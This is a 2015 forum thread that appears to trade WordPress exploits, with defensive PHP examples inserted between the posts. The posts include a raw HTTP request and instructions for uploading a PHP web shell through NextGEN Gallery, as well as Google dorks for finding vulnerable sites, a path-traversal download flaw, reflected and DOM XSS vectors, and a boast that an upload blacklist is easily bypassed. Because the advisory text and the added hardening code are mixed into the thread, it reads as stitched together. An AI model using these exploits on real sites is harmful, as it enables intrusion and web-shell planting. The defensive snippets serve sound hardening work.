27.04.2015, 12:54
WordPress 4.2 stored XSS
Quote from None:
*Details*
If the comment text is long enough, it will be truncated when inserted in
the database. The MySQL TEXT type size limit is 64 kilobytes so the comment
has to be quite long.
The truncation results in malformed HTML generated on the page. The
attacker can supply any attributes in the allowed HTML tags, in the same
way as the previous stored XSS vulnerabilities affecting WordPress.
The vulnerability bears a similarity to the one reported by Cedric Van
Bockhaven in 2014 (patched this week, after 14 months). Instead of using an
invalid UTF-8 character to truncate the comment, this time an excessively
long comment text is used for the same effect.
In these two cases the injected JavaScript apparently can't be triggered in
the administrative Dashboard, so these exploits require getting around
comment moderation e.g. by posting one harmless comment first.
*Proof of Concept*
Enter the following as a comment:
This was tested on WordPress 4.2, 4.1.2, and 4.1.1, MySQL versions 5.1.53
and 5.5.41.
*Solution*
Disable comments (Dashboard, Settings/Discussion, select as restrictive
options as possible). Do not approve any comments.
*Credits*
The vulnerability was discovered by Jouko Pynnönen of Klikki Oy.
An up-to-date version of this document:
http://klikki.fi/adv/wordpress2.html
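The advisory's root cause is that MySQL silently truncates an over-long comment at the TEXT column limit, which can split an otherwise well-formed, sanitized tag. The following is an added example (not code from the advisory or from WordPress) of the defender-side check: measure the comment in UTF-8 bytes against the column size before inserting, and reject it rather than let the database cut it. The 65535-byte constant is the TEXT limit named in the advisory; the 200-byte limit in the demo and the sample comment are constructed for illustration.

```php
<?php
// Added example, not part of the advisory above. It shows the defender-side
// fix for the root cause: check the UTF-8 byte length of a comment against the
// column size before inserting, instead of letting MySQL truncate silently.
// The 65535 limit is the MySQL TEXT maximum quoted in the advisory; the
// smaller limit used in the demo is an arbitrary scaled-down value.

const COMMENT_COLUMN_BYTES = 65535;

// True when the text fits the column as MySQL stores it. strlen() counts
// bytes; mb_strlen() counts characters and would under-count multibyte text,
// so a comment could pass a character-based check and still be truncated.
function comment_fits_column(string $text, int $limitBytes = COMMENT_COLUMN_BYTES): bool
{
    return strlen($text) <= $limitBytes;
}

// What the database does with an over-long value: keep the first N bytes,
// possibly cutting a tag or an attribute in half.
function simulate_truncation(string $text, int $limitBytes): string
{
    return substr($text, 0, $limitBytes);
}

// Crude well-formedness probe: the string must not end inside an open "<...",
// and every opened element needs a matching close. Enough to show the effect;
// not a substitute for a real sanitizer.
function html_looks_balanced(string $html): bool
{
    $lastOpen  = strrpos($html, '<');
    $lastClose = strrpos($html, '>');
    if ($lastOpen !== false && ($lastClose === false || $lastOpen > $lastClose)) {
        return false;
    }
    preg_match_all('#<([a-z][a-z0-9]*)[\s>/]#i', $html, $opened);
    preg_match_all('#</([a-z][a-z0-9]*)\s*>#i', $html, $closed);
    return count($opened[1]) === count($closed[1]);
}

// Constructed sample: a harmless, well-formed link whose title attribute pads
// the comment past a demo "column" of 200 bytes.
$limit   = 200;
$comment = '<a href="https://example.com" title="' . str_repeat('x', 300) . '">link</a> thanks';

var_dump(comment_fits_column($comment, $limit));                       // false: reject before insert
var_dump(html_looks_balanced($comment));                               // true
var_dump(html_looks_balanced(simulate_truncation($comment, $limit)));  // false: cut inside the <a ...> tag

// Character vs byte counting: 100 two-byte characters are 200 bytes.
$multibyte = str_repeat("\u{00E9}", 100);
var_dump(mb_strlen($multibyte) <= 150);            // true, but misleading
var_dump(comment_fits_column($multibyte, 150));    // false: 200 bytes do not fit
```

The point of the last two lines is the unit: the column limit is in bytes, so a length check done on characters (or in JavaScript on the form) still lets the database truncate multibyte text.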
29.04.2015, 16:31
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Code:
WordPress NextGEN Gallery plugin version 2.0.63 suffers from a remote shell upload vulnerability.
# Exploit Title: Wordpress NextGEN Gallery Plugin 2.0.63 Arbitrary File Upload
# Author: SANTHO ( @s4n7h0 )
# Vendor Homepage: http://wordpress.org/plugins/nextgen-gallery/
# Category: WebApp / CMS / Wordpress
# Version: 2.0.63 and less
---------------------------------------------------
Vulnerability Tracking
======================
Reported to vendor : Fri, May 9, 2014 at 9:20 PM
Vendor Acknowledgement : Sat, May 10, 2014 at 2:36 AM
Vendor Informed about patch release (version 2.65) : Mon, May 19, 2014 at 7:54 PM
Vulnerability Details
=====================
POST /index.php/photocrati_ajax?action=upload_image&gallery_id=0&gallery_name= HTTP/1.1
Host: target_ip
User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; rv:28.0) Gecko/20100101 Firefox/28.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://[target_ip]/wp-admin/admin.php?page=ngg_addgallery
Content-Length: 630
Content-Type: multipart/form-data; boundary=---------------------------2427186578189
Cookie: X-Frame-Events_290365e482ebdeeed313858b8a3de791=%7B%22event%22%3A%22new_gallery%22%2C%22gallery_id%22%3A1%2C%22gallery_title%22%3A%22folder_name%22%2C%22context%22%3A%22attach_to_post%22%7D; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_57cce18206a53fed21932c6dc2920f94=admin%7C1399203127%7C70f668b775581773d1500b1b8162de42; wp-settings-time-1=1399030444
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache

-----------------------------2427186578189
Content-Disposition: form-data; name="name"

cmd.php.jpg
-----------------------------2427186578189
Content-Disposition: form-data; name="file"; filename="cmd.php"
Content-Type: image/jpeg

The shell is accessible at the following URL:
http://[target-ip]/wp-content/gallery/folder_name/cmd.php
# 1337day.com #
Could someone please tell me how to use this wonder?
29.04.2015, 16:37
Quote from ICQ Hool:
WordPress NextGEN Gallery 2.0.63 Shell Upload Vulnerability
Could someone please tell me how to use this wonder?
You need to send a POST request and, when sending it, swap the extension from jpg to php.
The shell will be at /wp-content/gallery/folder_name/shell.php
29.04.2015, 19:54
Quote from winstrool:
MAC PHOTO GALLERY v. 2.7
dork: inurl:plugins/mac-dock-gallery/ download
@version: 2.7
Vulnerable code:
PHP code:
$file = dirname(dirname(dirname(__FILE__))) . "/uploads/mac-dock-gallery/" . $_GET['albid'];
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename=' . basename($file));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($file));
ob_clean();
flush();
readfile($file);
POC:
PATCH:
https://wordpress.org/plugins/mac-do...y/other_notes/
And there is an XSS in the same place:
Code:
http://crytotheblind.com/site/wp-content/plugins/mac-dock-gallery/mac_imageview.php?mac_albid=1">&limit=42
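The download handler quoted above builds the file path straight from $_GET['albid'] and hands it to readfile(). As an added example (not the mac-dock-gallery plugin's code and not its published patch), here is a hardened form of that handler: the requested value must be a bare file name, it is resolved with realpath(), and it is served only if the resolved path still lies inside the uploads directory. The directory layout, file names and the send_download helper are constructed for the demo.

```php
<?php
// Added example, not the mac-dock-gallery plugin's own code or its patch.
// Hardened form of the download handler quoted above: the client-supplied
// album id is treated as a bare file name, resolved with realpath(), and
// served only if it still lies inside the uploads directory.
// The directory layout below is constructed in a temp dir for the demo.

function resolve_download_path(string $uploadsDir, string $requested): ?string
{
    $base = realpath($uploadsDir);
    if ($base === false) {
        return null;
    }
    // Only a plain file name is acceptable: no empty value, no NUL byte, no
    // directory separators (basename() would strip them, so compare against it).
    if ($requested === '' || strpos($requested, "\0") !== false || basename($requested) !== $requested) {
        return null;
    }
    // realpath() also follows symlinks, so a link pointing elsewhere is caught.
    $full = realpath($base . DIRECTORY_SEPARATOR . $requested);
    if ($full === false || !is_file($full)) {
        return null;
    }
    // Containment check: the resolved path must start with "<base>/".
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($full, $prefix, strlen($prefix)) !== 0) {
        return null;
    }
    return $full;
}

function send_download(string $path): void
{
    header('Content-Description: File Transfer');
    header('Content-Type: application/octet-stream');
    // Quote and encode the name so a file name cannot inject header syntax.
    header('Content-Disposition: attachment; filename="' . rawurlencode(basename($path)) . '"');
    header('Content-Length: ' . filesize($path));
    readfile($path);
}

// Constructed layout: <root>/uploads/mac-dock-gallery/album1.zip is servable,
// <root>/config.txt is not.
$root    = sys_get_temp_dir() . '/macdock_demo_' . getmypid();
$uploads = $root . '/uploads/mac-dock-gallery';
mkdir($uploads, 0700, true);
file_put_contents($uploads . '/album1.zip', 'demo archive');
file_put_contents($root . '/config.txt', 'not for download');

foreach (['album1.zip', '../../config.txt', 'missing.zip', ''] as $albid) {
    $resolved = resolve_download_path($uploads, $albid);
    printf("%-20s -> %s\n", var_export($albid, true), $resolved === null ? 'reject (404)' : 'serve');
}
// 'album1.zip' -> serve; the other three -> reject (404)

// In the real handler:
//   $p = resolve_download_path($uploads, $_GET['albid'] ?? '');
//   if ($p === null) { http_response_code(404); exit; }
//   send_download($p);

unlink($uploads . '/album1.zip');
unlink($root . '/config.txt');
rmdir($uploads);
rmdir($root . '/uploads');
rmdir($root);
```

Two design choices matter here: the name check happens before any filesystem call, and the containment check runs on the realpath() result rather than on the string the client sent, so symlinks and any separator the name-check might miss are judged by where the path actually ends up.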
13.05.2015, 19:28
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Affected Versions: 4.2.1 and probably below
Proof of Concept URL for DOM XSS in WordPress:
Code:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#
Source: http://seclists.org/bugtraq/2015/May/56
13.05.2015, 20:08
Quote from VY_CMa:
Wordpress Twenty Fifteen Theme - DOM XSS Vulnerability - CVE-2015-3429
Or this vector for Chrome:
http://example.com/wp-content/themes/twentyfifteen/genericons/example.html#1
22.05.2015, 20:54
Quote from faza02:
You need to send a POST request and, when sending it, swap the extension from jpg to php.
The shell will be at /wp-content/gallery/folder_name/shell.php
But doesn't that require admin rights?
05.06.2015, 00:38
This bug was published in public:
https://www.exploit-db.com/exploits/37166/ - WordPress dzs-zoomsounds Plugins
PHP code:
        die('invalid extension - disallowed_filetypeshideFeedbacksCall()');
    }
    if (!is_writable($upload_dir)) {
        die('dir not writable - check permissionshideFeedbacksCall()');
    }
    if (copy($_FILES['file_field']['tmp_name'], $path)) {
        echo 'file uploadedtop.hideFeedbacksCall();';
    } else {
        echo 'file could not be uploadedwindow.hideFeedbacksCall()';
    }
} else {
    $headers = get_theheaders();
    if (isset($headers['HTTP_X_FILE_NAME'])) {
        //print_r($headers);
        $file_name = $headers['HTTP_X_FILE_NAME'];
        $file_name = str_replace(" ", "_", $file_name); // strip spaces
        $target = $upload_dir . "/" . $file_name;
        //==== checking for disallowed file types
        $sw = false;
        foreach ($disallowed_filetypes as $dft) {
            $pos = strpos($file_name, $dft);
            if ($pos !== false) {
                $sw = true;
            }
        }
        if ($sw == true) {
            die('invalid extension - disallowed_filetypes');
        }
        if (!is_writable($upload_dir)) {
            die('dir not writable - check permissions');
        }
        //echo $target;
        $content = file_get_contents("php://input");
        if (file_put_contents($target, $content)) {
            echo 'success';
        } else {
            die('error at file_put_contents');
        }
    } else {
        die('not for direct access');
    }
}
The longest line with a set of extensions that I came across was this one:
$disallowed_filetypes = array('.php', '.exe', '.shtml', '.html', '.htm','.phtml','.php5', '.php4', '.pl', '.py', '.rb', '.htaccess', '.asp', '.jsp', '.aspx');
but whoever understands this section of code:
PHP code:
foreach ($disallowed_filetypes as $dft) {
    $pos = strpos($file_name, $dft);
    if ($pos !== false) {
        $sw = true;
    }
}
will understand that it is no obstacle to us ;-)
Reflected (passive) XSS:
wp-content/plugins/dzs-videogallery/ajax.php?source="/>alert();
wp-content/plugins/dzs-videogallery/ajax.php?type="/>alert();
http://digitalzoomstudio.net/ - the author's blog
http://codecanyon.net/user/ZoomIt/portfolio - sales portfolio for the components
P.S.: tags for Google)) dzs-videogallery exploit, dzs-zoomsounds exploit, dzs-calendar exploit, html5uploader exploit, php_ygallery exploit, php_mediagallery exploit, custom_rapista exploit, themes/royale/ exploit
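Both upload bugs in this thread come down to the same weak check: the dzs uploader above looks for blacklisted substrings with strpos() in a name the client controls, and the NextGEN request earlier carries a "name" field of cmd.php.jpg beside a part named cmd.php, so whichever of the two the server trusts decides the file's fate. The following is an added example (not the dzs/html5uploader code and not from the NextGEN advisory) of the defender-side alternative: an allowlist on the single, final extension, a magic-byte check that the content matches that extension, and a server-generated stored name so no client-supplied string reaches the filesystem. The allowlist, the sample names and the constructed PNG bytes are assumptions for the demo.

```php
<?php
// Added example, not code from the dzs/html5uploader plugin or the NextGEN
// advisory. Replaces a substring blacklist with an allowlist on the final
// extension and decouples the stored name from anything the client supplied.

const ALLOWED_IMAGE_EXT = [
    'jpg'  => 'image/jpeg',
    'jpeg' => 'image/jpeg',
    'png'  => 'image/png',
    'gif'  => 'image/gif',
];

// Returns the extension to store under, or null to reject. Only the LAST
// extension counts, and the name must contain exactly one dot, so a
// double extension such as cmd.php.jpg is rejected outright.
function allowed_extension(string $clientName): ?string
{
    $base = basename(str_replace('\\', '/', $clientName)); // drop any path part
    if ($base === '' || $base[0] === '.' || strpos($base, "\0") !== false) {
        return null;                     // empty, dotfile (.htaccess), or NUL byte
    }
    if (substr_count($base, '.') !== 1) {
        return null;                     // no extension, or more than one
    }
    $ext = strtolower(pathinfo($base, PATHINFO_EXTENSION));
    return array_key_exists($ext, ALLOWED_IMAGE_EXT) ? $ext : null;
}

// Verifies the bytes really are the claimed image type (finfo reads the magic
// bytes) and returns a server-generated name, or null on any mismatch.
function safe_stored_name(string $clientName, string $tmpPath): ?string
{
    $ext = allowed_extension($clientName);
    if ($ext === null) {
        return null;
    }
    $finfo    = new finfo(FILEINFO_MIME_TYPE);
    $detected = $finfo->file($tmpPath);
    if ($detected !== ALLOWED_IMAGE_EXT[$ext]) {
        return null;                     // extension says image, content says otherwise
    }
    return bin2hex(random_bytes(16)) . '.' . $ext;
}

// Constructed sample names (no real uploads involved here).
foreach (['photo.jpg', 'Photo.JPEG', 'cmd.php', 'cmd.php.jpg', '.htaccess', 'noext', 'a/b.gif'] as $name) {
    printf("%-12s -> %s\n", $name, allowed_extension($name) ?? 'reject');
}
// photo.jpg -> jpg, Photo.JPEG -> jpeg, a/b.gif -> gif (path part dropped),
// cmd.php, cmd.php.jpg, .htaccess, noext -> reject

// Constructed PNG header written to a temp file to exercise the content check.
$tmp = tempnam(sys_get_temp_dir(), 'up');
file_put_contents($tmp,
    "\x89PNG\r\n\x1a\n" . "\0\0\0\x0dIHDR" . "\0\0\0\x01\0\0\0\x01\x08\x02\0\0\0" . "\0\0\0\0");
var_dump(safe_stored_name('logo.png', $tmp) !== null); // true: extension and magic bytes agree
var_dump(safe_stored_name('logo.jpg', $tmp));          // NULL: claims JPEG, content is PNG
unlink($tmp);
```

The stored name is generated on the server, so it does not matter which of the two client-supplied names (form field or part filename) the framework happens to expose; neither reaches the path. Pair this with serving the upload directory without script execution (for example, a handler that refuses to execute anything under wp-content/gallery), since a content check alone does not stop a polyglot file.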
05.06.2015, 22:34
Quote from winstrool:
foreach ($disallowed_filetypes as $dft) {
    $pos = strpos($file_name, $dft);
    if ($pos !== false) {
        $sw = true;
    }
}
And how does one get around that?
05.06.2015, 22:51